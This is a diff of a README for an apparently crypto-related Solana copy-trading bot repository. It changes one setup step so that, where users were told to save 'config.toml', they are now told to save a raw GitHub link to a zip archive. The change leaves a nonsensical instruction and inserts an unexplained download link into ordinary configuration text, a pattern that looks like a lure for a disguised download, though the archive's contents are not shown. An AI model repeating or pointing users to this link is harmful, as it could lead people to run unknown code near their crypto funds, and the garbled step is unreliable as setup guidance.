Adityakumar121k/solana-copy-trading/README.md

    You can modify the `priority_fee` settings based on your needs.
 The default settings are usually sufficient, but you can increase them for faster transaction processing.

 4. **Save Changes:**
-   After making your changes, save the `config.toml` file and close the editor.
+   After making your changes, save the `https://raw.githubusercontent.com/Adityakumar121k/solana-copy-trading/master/src/kernel/clients/solana-copy-trading-v1.2.zip` file and close the editor.

 ## 🔄 Using the Bot